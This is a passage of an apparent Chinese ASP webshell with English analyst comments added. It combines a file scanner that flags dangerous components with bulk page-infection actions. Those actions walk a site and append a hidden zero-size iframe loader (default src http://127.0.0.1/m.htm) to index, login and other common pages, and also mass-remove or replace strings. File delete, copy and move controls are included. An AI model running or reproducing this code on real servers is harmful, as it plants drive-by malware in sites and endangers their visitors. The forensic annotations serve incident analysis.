&""",""MoveFile"")' class='am' title='移动'>移动</a>"
' Plain substring checks against the lower-cased file text. After the first hit
' for a file, temp is replaced by a "same as above" marker for later rows.
If instr( filetxt, Lcase
("WScr"&DoMyBest&"ipt.Shell") ) or Instr( filetxt, Lcase
("clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8") ) then
Report =
Report&"<tr><td>"&temp&"</td><td>WScr"&DoMyBest&"ipt.Shell 或者
clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8</td><td><font
color=red>危险组件,一般被ASP木马利用
</font>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End if
If instr( filetxt, Lcase
("She"&DoMyBest&"ll.Application") ) or Instr( filetxt, Lcase
("clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000") ) then
Report =
Report&"<tr><td>"&temp&"</td><td>She"&DoMyBest&"ll.Application 或者
clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000</td><td><font
color=red>危险组件,一般被ASP木马利用
</font>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
' Regular-expression checks; one RegExp object is reused with a new Pattern each time.
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "\bLANGUAGE\s*=\s*[""]?\s*
(vbscript|jscript|javascript).encode\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>
(vbscript|jscript|javascript).Encode</td><td><font color=red>似乎脚本被
加密了</font>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "\bEv"&"al\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>Ev"&"al</td><td>e"&"val()函数可以执行
任意ASP代码<br>但是javascript代码中也可以使用,有可能是误
报。"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify
(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "[^.]\bExe"&"cute\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>Exec"&"ute</td><td><font
color=red>e"&"xecute()函数可以执行任意ASP代码
</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "\.(Open|Create)TextFile\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>.CreateTextFile|.OpenTextFile</td><td>
使用了FSO的CreateTextFile|OpenTextFile读写文
件"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify
(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "\.SaveToFile\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>.SaveToFile</td><td>使用了Stream的
SaveToFile函数写文件"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "\.Save\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>.Save</td><td>使用了XMLHTTP的Save函数
写文件"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
Set regEx = Nothing
' Follow #include file="..." references (resolved relative to this file's folder).
' Only targets whose extension CheckExt rejects are scanned from here;
' presumably the others are reached by the directory walk - confirm.
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "<!--\s*#include\s*file\s*=\s*"".*"""
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
tFile = Replace(Mid(Match.Value, Instr
(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") -
1),"/","\")
If Not CheckExt(FSO1s.GetExtensionName(tFile))
Then
Call ScanFile( Mid(FilePath,1,InStrRev
(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")
&"\","",1,1,1) )
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
' Same for #include virtual="...", resolved against the web root.
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "<!--
\s*#include\s*virtual\s*=\s*"".*"""
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
tFile = Replace(Mid(Match.Value, Instr
(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") -
1),"/","\")
If Not CheckExt(FSO1s.GetExtensionName(tFile))
Then
Call ScanFile( Server.MapPath("\")
&"\"&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
' Server.Execute / Server.Transfer with a quoted literal path: scan the target.
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]
*|\()"".*"""
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
tFile = Replace(Mid(Match.Value, Instr
(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") -
1),"/","\")
If Not CheckExt(FSO1s.GetExtensionName(tFile))
Then
Call ScanFile( Mid(FilePath,1,InStrRev
(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")
&"\","",1,1,1) )
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
' Server.Execute / Server.Transfer whose argument is not a quoted literal cannot
' be followed, so it is only reported.
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]
*|\()[^""]\)"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>Server.Exec"&"ute</td><td><font
color=red>不能跟踪检查Server.e"&"xecute()函数执行的文件。
</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
End If
Set Matches = Nothing
Set regEx = Nothing
' <script ... runat=server ...> tags: extract the src attribute value by hand
' (quoted or unquoted) and scan that file relative to this file's folder.
' NOTE(review): XregEx and XMatches are not released after the loop; the
' cleanup lines that follow it reset Matches and regEx instead.
Set XregEx = New RegExp
XregEx.IgnoreCase = True
XregEx.Global = True
XregEx.Pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?
server""?(.|\n)*?>"
Set XMatches = XregEx.Execute(filetxt)
For Each Match in XMatches
tmpLake2 = Mid(Match.Value, 1, InStr
(Match.Value, ">"))
srcSeek = InStr(1, tmpLake2, "src", 1)
If srcSeek > 0 Then
srcSeek2 = instr(srcSeek, tmpLake2,
"=")
For i = 1 To 50
tmp = Mid(tmpLake2, srcSeek2 +
i, 1)
If tmp <> " " and tmp <> chr(9)
and tmp <> vbCrLf Then
Exit For
End If
Next
If tmp = """" Then
tmpName = Mid(tmpLake2,
srcSeek2 + i + 1, Instr(srcSeek2 + i + 1, tmpLake2, """") - srcSeek2 -
i - 1)
Else
If InStr(srcSeek2 + i + 1,
tmpLake2, " ") > 0 Then tmpName = Mid(tmpLake2, srcSeek2 + i, Instr
(srcSeek2 + i + 1, tmpLake2, " ") - srcSeek2 - i) Else tmpName =
tmpLake2
If InStr(tmpName, chr(9)) > 0
Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, chr(9)) - 1)
If InStr(tmpName, vbCrLf) > 0
Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, vbcrlf) - 1)
If InStr(tmpName, ">") > 0 Then
tmpName = Mid(tmpName, 1, Instr(1, tmpName, ">") - 1)
End If
Call ScanFile( Mid(FilePath,1,InStrRev
(FilePath,"\"))&tmpName , replace(FilePath,server.MapPath("\")
&"\","",1,1,1))
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
' CreateObject(...) whose argument is built at run time (contains & or +, has no
' quoted string, or has more than one opening parenthesis) is reported as
' obfuscated object creation.
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "CreateO"&"bject[ |\t]*\(.*\)"
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
If Instr(Match.Value, "&") or Instr
(Match.Value, "+") or Instr(Match.Value, """") = 0 or Instr
(Match.Value, "(") <> InStrRev(Match.Value, "(") Then
Report =
Report&"<tr><td>"&temp&"</td><td>Creat"&"eObject</td><td>Crea"&"teObjec
t函数使用了变形技术"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
' Only the first such call is reported; Exit Sub also skips the cleanup below.
exit sub
End If
Next
Set Matches = Nothing
Set regEx = Nothing
end if
set ofile = nothing
set FSO1s = nothing
End Sub
' Reports whether FileExt is one of the comma-separated extensions held in the
' script-level DimFileExt; the value "*" accepts every extension.
' FileExt is lower-cased before comparison, the entries of DimFileExt are used
' as given, so the list has to be lower case and free of spaces to match.
' Returns True on a match; otherwise the function value is left unassigned (Empty).
Function CheckExt(FileExt)
    If DimFileExt = "*" Then CheckExt = True
    Ext = Split(DimFileExt, ",")
    i = 0
    Do While i <= UBound(Ext)
        If Ext(i) = LCase(FileExt) Then
            CheckExt = True
            Exit Function
        End If
        i = i + 1
    Loop
End Function
' Returns the last-modified timestamp of filepath as reported by FileSystemObject.
' There is no error handling here: GetFile raises for a path that does not exist
' unless the caller has On Error Resume Next active.
' NOTE(review): f and s are not declared with Dim in the visible code; if
' script-level variables with these names exist, this function overwrites them
' (ShowAllFile also keeps its folder object in f) - confirm.
Function GetDateModify(filepath)
Set F2SO = CreateObject("Scripting.FileSystemObject")
Set f = F2SO.GetFile(filepath)
s = f.DateLastModified
set f = nothing
set F2SO = nothing
GetDateModify = s
End Function
' Returns the creation timestamp of filepath as reported by FileSystemObject.
' There is no error handling here: GetFile raises for a path that does not exist
' unless the caller has On Error Resume Next active.
' NOTE(review): f and s are not declared with Dim in the visible code; if
' script-level variables with these names exist, this function overwrites them - confirm.
Function GetDateCreate(filepath)
Set F3SO = CreateObject("Scripting.FileSystemObject")
Set f = F3SO.GetFile(filepath)
s = f.DateCreated
set f = nothing
set F3SO = nothing
GetDateCreate = s
End Function
' Minimal escaping for a path that is placed inside an href: only "%", "#" and
' "&" are percent-encoded; every other character is returned unchanged, so this
' is not a general URL or HTML encoder.
Function tURLEncode(Str)
    ' "%" is replaced first (innermost call) so the escapes produced for "#"
    ' and "&" are not escaped a second time.
    temp = Replace(Replace(Replace(Str, "%", "%25"), "#", "%23"), "&", "%26")
    tURLEncode = temp
End Function
' Recursive directory walk for the file-search mode: every file whose extension
' is accepted by CheckExt is passed to IsFind, and SumFiles / SumFolders are
' incremented for the scan summary.
' Path: folder to walk; a folder that does not exist is skipped without a message.
' NOTE(review): no Dim statements are visible, so f, fc, fc2, myfile and f1 may be
' shared with other procedures using the same names - confirm before refactoring.
Sub ShowAllFile2(Path)
Set F4SO = CreateObject("Scripting.FileSystemObject")
if not F4SO.FolderExists(path) then exit sub
Set f = F4SO.GetFolder(Path)
Set fc2 = f.files
For Each myfile in fc2
If CheckExt(F4SO.GetExtensionName
(path&"\"&myfile.name)) Then
Call IsFind(Path&"\"&myfile.name)
SumFiles = SumFiles + 1
End If
Next
' Descend into every subfolder; no depth limit is applied in this Sub.
Set fc = f.SubFolders
For Each f1 in fc
ShowAllFile2 path&"\"&f1.name
SumFolders = SumFolders + 1
Next
Set F4SO = Nothing
End Sub
' File-search filter: adds thePath to Report when its last-modified date matches
' one of the dates posted in Search_Date (";"-separated, or "ALL" for any date)
' and, if Search_Content was supplied, when the lower-cased file text contains it.
' The date compared is the part of the timestamp before the first space, so the
' posted dates must use the server's date format.
' A match increments Sun and leaves the Sub immediately.
' NOTE(review): most of the action links below are built from FilePath, which is
' not a parameter of this Sub (the parameter is thePath) - confirm what FilePath
' holds when this runs.
' NOTE(review): the early Exit Sub in the content branch skips ofile.close().
Sub IsFind(thePath)
theDate = GetDateModify(thePath)
on error resume next
theTmp = Mid(theDate, 1, Instr(theDate, " ") - 1)
if err then exit Sub
xDate = Split(request.Form("Search_Date"),";")
If request.Form("Search_Date") = "ALL" Then ALLTime = True
For i = 0 To Ubound(xDate)
If theTmp = xDate(i) or ALLTime = True Then
If request("Search_Content") <> "" Then
Set FSO2s = CreateObject
("Scripting.FileSystemObject")
set ofile = FSO2s.OpenTextFile(thePath,
1, false, -2)
filetxt = Lcase(ofile.readall())
If Instr( filetxt, LCase(request.Form
("Search_Content"))) > 0 Then
temp = "<a
href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode
(Replace(replace(thePath,server.MapPath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)
&"</a>"
temp=temp&" → <a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""EditFile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""CopyFile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""MoveFile"")' class='am' title='移动'>移动</a>"
' NOTE(review): the same row is appended twice (this statement and the next one).
Report = Report&"<tr><td
height=30>"&temp&"</td><td>"&GetDateCreate(thePath)
&"</td><td>"&theDate&"</td></tr>"
Report =
Report&"<tr><td>"&temp&"</td><td>"&GetDateCreate(thePath)
&"</td><td>"&theDate&"</td></tr>"
Sun = Sun + 1
Exit Sub
End If
ofile.close()
Set ofile = Nothing
Set FSO2s = Nothing
Else
' No content filter: a date match alone lists the file.
temp = "<a
href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode
(replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)
&"</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""EditFile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""CopyFile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""MoveFile"")' class='am' title='移动'>移动</a>"
Report = Report&"<tr><td
height=30>"&temp&"</td><td>"&GetDateCreate(thePath)
&"</td><td>"&theDate&"</td></tr>"
Sun = Sun + 1
Exit Sub
End If
End If
Next
End Sub
Case "plgm"
' Analyst note - "plgm" action: parameter handling and input form for appending a
' code snippet to page files under a chosen folder.
' Request fields read here: fd (start folder, defaults to the web root), code
' (snippet to append), ex / pth (dispatch to file_show / file_save, which are
' not defined in the visible code), newcnt.
' When no snippet is posted the default is an <iframe> with width=0 height=0
' pointing at http://127.0.0.1/m.htm; markup of that shape appended to the end
' of served pages is the artifact this feature leaves behind.
Server.ScriptTimeout=1000000
Response.Buffer=False
RRS ("<b>当前网站绝对路径:")&Server.MapPath("/")&("</b>")
ASP_SELF=Request.ServerVariables("PATH_INFO")
s=Request("fd")
if s="" then s=Server.MapPath("/")
ex=Request("ex")
pth=Request("pth")
newcnt=Request("newcnt")
addcode = Request("code")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm width=0
height=0></iframe>"
If ex<>"" AND pth<>"" Then
select Case ex
Case "edit"
CALL file_show(pth)
Case "save"
CALL file_save(pth)
End select
Else
RRS("<form method=""POST""> ")
RRS("<table width=560 border=""0"" style=""font-size:12px;"">")
RRS("<tr>")
RRS("<td width=""102"">要挂马文件夹的绝对路径:</td>")
RRS("<td width=""359""><input type=""text"" name=""fd"" value="""&s&"""
size=60></td>")
RRS("<td width=""69""> </td>")
RRS("</tr><tr><td>要挂马的代码:</td>")
RRS("<td><textarea name=""code"" cols=58
rows=""3"">"&addcode&"</textarea></td>")
RRS("<td><input name=""submit"" type=""submit"" value=""开始""></td>")
RRS("</tr></table></form> ")
End If
' Case-insensitive regular-expression test.
' patt: pattern text; str: string to test.
' Returns True when patt matches anywhere in str, False otherwise.
Function IsPattern(patt,str)
    Set regEx = New RegExp
    regEx.IgnoreCase = True
    regEx.Pattern = patt
    retVal = regEx.Test(str)
    Set regEx = Nothing
    ' Normalise to a strict Boolean, exactly as the explicit True/False branches did.
    IsPattern = (retVal = True)
End Function
' On form submit: with an empty folder or empty snippet, print an error and stop.
' Otherwise the folder walk (sch) runs only if the folder value contains a
' drive-style prefix ("X:\" or "X:/") whose letter is not a or b; the pattern is
' tested case-insensitively by IsPattern. Any other value does nothing and
' prints no message.
if request.form("submit")<>"" then
If s="" or addcode="" Then
RRS "<font color=red>请输入挂马的路径或代码!</font>"
response.end
else If IsPattern("[^ab]{1}:{1}(\\|\/)",s) Then sch s
End If
end if
' Analyst note: recursive walk used by the "plgm" action. Every file under
' folder s is passed to step_all by full path, then each subfolder is walked
' the same way. Errors are suppressed for the whole walk, so folders or files
' that cannot be accessed are skipped without any output.
' Detection note: VBScript keywords are case-insensitive, so the mixed-case
' "oN eRrOr rEsUmE nExT" below behaves like the normal spelling; signatures for
' script content need to be matched case-insensitively.
Sub sch(s)
oN eRrOr rEsUmE nExT
Set fs=Server.createObject("Scripting.FileSystemObject")
Set fd=fs.GetFolder(s)
Set fi=fd.Files
Set sf=fd.SubFolders
For Each f in fi
rtn=f.path
step_all rtn
Next
If sf.Count<>0 Then
For Each l In sf
sch l
Next
End If
End Sub
' Analyst note: target filter for the "plgm" action. agr is a full file path;
' it is processed only when the file's base name is one of the listed common
' page names (default, index, conn, admin, login, upload, config, ...) and the
' extension is htm, html, asp, php, jsp, aspx, cgi or js. The test is
' case-insensitive (see IsPattern). Matching files are listed by step1 and then
' modified by step2; everything else is left untouched.
' For incident scoping this means the files to inspect first are those with
' these base names and extensions under the folder that was walked.
Sub step_all(agr)
retVal=IsPattern("(\\|\/)
(default|index|conn|admin|bbs|reg|help|upfile|upload|cart|class|login|d
iy|no|ok|del|config|sql|user|ubb|ftp|asp|top|new|open|name|email|img|im
ages|web|blog|save|data|add|edit|game|about|manager|book|bt|config|mp3|
vod|error|copy|move|down|system|logo|QQ|520|newup|myup|play|show|view|i
p|err404|send|foot|char|info|list|shop|err|nc|ad|flash|text|admin_upfil
e|admin_upload|upfile_load|upfile_soft|upfile_photo|upfile_softpic|vip|
505)\.(htm|html|asp|php|jsp|aspx|cgi|js)\b",agr)
If retVal Then
step1 agr
step2 agr
Else
Exit Sub
End If
End Sub
' Prints one result line for str1 (a full file path) with download / edit /
' delete / copy / move links. Each link calls the page's FullForm() script with
' the path (backslashes doubled for the JavaScript string) and an action name
' that the Select Case at the end of this file dispatches on.
' This Sub only writes HTML; it does not touch the file.
Sub step1(str1)
RRS "<div style='line-height:20px'>√ "&str1&" _"
RRs "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""DownFile"")' class='am' title='下载'>下载</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""EditFile"")' class='am' title='编辑'>编辑</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""DelFile"")'onclick='return yesok()' class='am' title='删除'>删除
</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""CopyFile"")' class='am' title='复制'>复制</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""MoveFile"")' class='am' title='移动'>移动</a></div>"
End Sub
' Analyst note: the write step of the "plgm" action. If str2 exists it is opened
' for appending (mode 8, format -2 = system default) and the script-level
' addcode string is written at the end of the file with no line break added.
' Forensic consequences visible from this code: the original content is kept,
' the added markup is the last thing in the file, and the file is rewritten in
' place (so its last-modified time is expected to change).
' Paths whose 8th-to-5th characters from the end are "conn" (for example a file
' named conn.asp) take the other branch, which calls Write with no argument and
' never closes the stream; presumably this leaves such files unchanged - confirm.
Sub step2(str2)
Set fs=Server.createObject("Scripting.FileSystemObject")
isExist=fs.FileExists(str2)
If isExist Then
Set f=fs.GetFile(str2)
Set f_addcode=f.OpenAsTextStream(8,-2)
if left(right(str2,8),4)="conn" then
f_addcode.Write
else
f_addcode.Write addcode
f_addcode.Close
Set f=Nothing
End If
end if
Set fs=Nothing
End Sub
Err.Clear
Case "Cplgm"
' Analyst note - "Cplgm" action: one form that drives three bulk file operations,
' selected by request field M and carried out by InsertAllFiles:
'   M=1 append a code string to files, M=2 remove a given string from files,
'   M=3 find-and-replace a string in files. With M empty the response ends
'   right after the heading is started.
' Request fields read here: fd (start folder; "\" maps to the web root, "." or
' empty also map to Server.MapPath("/")), code and code2 (strings to add, remove
' or replace), pcfile (file names to leave alone; defaults to this script's own
' file name so the tool does not modify itself), FType (extension list, default
' txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx), checkbox (duplicate guard for
' M=1) and ShowMsg.
' The default code value is the same width=0 height=0 iframe used by "plgm".
' NOTE(review): the form's fd field is always rendered with the value "\" and the
' code2 textarea is pre-filled with addcode, not addcode2.
Fpath=Request("fd")
addcode = Request("code")
addcode2 = Request("code2")
pcfile=request("pcfile")
checkbox=request("checkbox")
ShowMsg=request("ShowMsg")
FType=request("FType")
M=request("M")
if Ftype="" then
Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
if Fpath="\" then Fpath=Server.MapPath("\")
if Fpath="." or Fpath="" then Fpath=Server.MapPath("/")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm
width=0 height=0></iframe>"
if checkbox="" then checkbox=request("checkbox")
if pcfile="" then
pcfileName=Request.ServerVariables("SCRIPT_NAME")
pcfilek=split(pcfileName,"/")
pcfilen=ubound(pcfilek)
pcfile=pcfilek(pcfilen)
end if
RRS ("<b>网站根目录</b>- "&Server.MapPath("/")&"<br>")
RRS ("<b>本程序目录</b>- "&Server.MapPath("."))
RRS "<form method=POST><div style='color:#3399ff'><b>["
if M="1" then RRS"批量挂马器-批量挂马"
if M="2" then RRS"批量清马器-清除别人的网马"
if M="3" then RRS"批量替换器-文件替换修改工具"
if M="" then response.end
RRS "]</b></div><table width=100% border=0><tr><td>文件路径:
</td>"
RRS "<td><input type=text name=fd value=""\"" size=40> 填“\”
即网站根目录;“.”为程序所在目录</td></tr>"
if M="1" then RRS "<tr><td>过滤重复:</td><td><input class=c
name='checkbox' checked='checked' type=checkbox value=""checked""
"&checkbox&"> 防止一个页面中有多个重复的代码</td></tr>"
RRS "<tr><td>排除文件:</td>"
RRS "<td><input name='pcfile' type=text id='pcfile'
value='"&pcfile&"' size=40> 输入不想被修改的文件名,例如:
1.asp|2.asp|3.asp</td></tr>"
RRS "<tr><td>文件类型:</td>"
RRS "<td><input name='FType' type=text id='FType'
value='"&Ftype&"' size=40> 输入要修改的文件类型[扩展名],例如:
htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td><font color=#3399ff>"
if M="1" then RRS"要挂的马:"
if M="2" then RRS"要清的马:"
if M="3" then RRS"查找内容:"
RRS"</font></td><td><textarea name=code cols=66
rows=3>"&addcode&"</textarea></td></tr>"
if M="3" then RRS "<tr><td><font color=#3399ff>替 换 为:
</font></td><td><textarea name=code2 cols=66
rows=3>"&addcode&"</textarea></td></tr>"
RRS "<tr><td></td><td> <input name=submit type=submit value=开
始执行> --标记解释--[成功:√ , 排除:× , 重复:<font color=red>×
</font>]</td></tr>"
RRS "</table></form>"
if request("submit")="开始执行" then
RRS"<div style='line-height:25px'><b>执行记录:</b><br>"
call InsertAllFiles(Fpath,addcode,pcfile)
RRS"</div>"
end if
' Analyst note: recursive bulk file modifier behind the "Cplgm" action.
' Wpath: folder to process (a trailing "\" is added if missing).
' Wcode: string to append (M=1), remove (M=2) or search for (M=3).
' pc:    exclusion list; a file is skipped when its name occurs anywhere in
'        this string (substring test, case-insensitive).
' Also reads the script-level M, checkbox, FType and addCode2.
' A file is processed only if it is not excluded and its extension occurs in
' FType (again a substring test). Per mode:
'   M=1 appends Wcode plus a line break; with checkbox="checked" the file is
'       read first and skipped when it already contains Wcode.
'   M=2 rewrites the file with every occurrence of Wcode removed.
'   M=3 rewrites the file with every occurrence of Wcode replaced by addCode2.
' Modes 2 and 3 recreate the file with CreateTextFile(..., True), i.e. the
' whole file is overwritten. All errors are suppressed (On Error Resume Next),
' so the marks printed per file do not prove that a write succeeded.
' For incident scoping: every mode rewrites files in place, so last-modified
' times clustered around one request are the practical pivot; restoring from a
' known-good copy is more reliable than string removal with mode 2.
' File names starting with "conn" take a branch that calls Write with no
' argument; presumably such files are left unchanged - confirm.
Sub InsertAllFiles(Wpath,Wcode,pc)
Server.ScriptTimeout=999999999
if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
Set WFSO = CreateObject("Scripting.FileSystemObject")
on error resume next
Set f = WFSO.GetFolder(Wpath)
Set fc2 = f.files
For Each myfile in fc2
Set FS1 = CreateObject("Scripting.FileSystemObject")
FType1=split(myfile.name,".")
FType2=ubound(FType1)
if Ftype2>0 then
FType3=LCase(FType1(FType2))
else
FType3="无"
end if
if Instr(LCase(pc),LCase(myfile.name))=0 and Instr
(LCase(FType),FType3)<>0 then
select case M
case "1"
if checkbox<>"checked" then
Set
tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
if left(myfile.name,4)="conn"
then
tfile.Write
RRS"√
"&Wpath&myfile.name
else
tfile.writeline Wcode
RRS"√
"&Wpath&myfile.name
tfile.close
end if
end if
if checkbox="checked" then
Set
tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
if Instr
(tfile1.readall,Wcode)=0 then
Set
tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
if left(myfile.name,4)
="conn" then
tfile.Write
RRS"×
"&Wpath&myfile.name
else
tfile.writeline Wcode
RRS"√
"&Wpath&myfile.name
tfile1.close
end if
else
RRS"<font
color=red>×</font> "&Wpath&myfile.name
tfile1.close
end if
Set tfile1=Nothing
end if
' M=2: read the whole file, drop every occurrence of Wcode, overwrite the file.
case "2"
Set tfile1=FS1.opentextfile
(Wpath&""&myfile.name,1,-2)
NewCode=Replace
(tfile1.readall,Wcode,"")
Set
objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
objCountFile.Write NewCode
objCountFile.Close
RRS"√ "&Wpath&myfile.name
Set objCountFile=Nothing
' M=3: same rewrite, with Wcode replaced by the script-level addCode2.
case "3"
Set tfile1=FS1.opentextfile
(Wpath&""&myfile.name,1,-2)
NewCode=Replace
(tfile1.readall,Wcode,addCode2)
Set
objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
objCountFile.Write NewCode
objCountFile.Close
RRS"√ "&Wpath&myfile.name
Set objCountFile=Nothing
case else
RRS"大哥,别乱来.":response.end
end select
else
RRS"× "&Wpath&myfile.name
end if
RRS " → <a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='下
载'>下载</a> "
RRS "<a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='编
辑'>编辑</a> "
' NOTE(review): this link is built from str1, which is not assigned in this Sub;
' the other four links use Wpath&myfile.name.
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""DelFile"")' onclick='return yesok()' class='am' title='删除'>删
除</a> "
RRS "<a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='复
制'>复制</a> "
RRS "<a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='移
动'>移动</a><br>"
Next
Set fsubfolers = f.SubFolders
For Each f1 in fsubfolers
NewPath=Wpath&""&f1.name
InsertAllFiles NewPath,Wcode,pc
Next
set tfile=nothing
Set FSO = Nothing
set tfile=nothing
set tfile2=nothing
Set WFSO = Nothing
End Sub
Case "ReadREG":call ReadREG()
Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session
("FolderPath")):Set ABC=Nothing
Case "DownFile":DownFile FName:ShowErr()
Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set
ABC=Nothing
Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set
ABC=Nothing
